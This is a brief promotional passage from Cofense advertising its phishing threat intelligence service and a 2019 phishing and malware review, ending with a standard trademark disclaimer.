Easily consume phishing-specific threat intelligence to proactively defend your organisation against evolving threats with Cofense IntelligenceTM.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand current threats, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.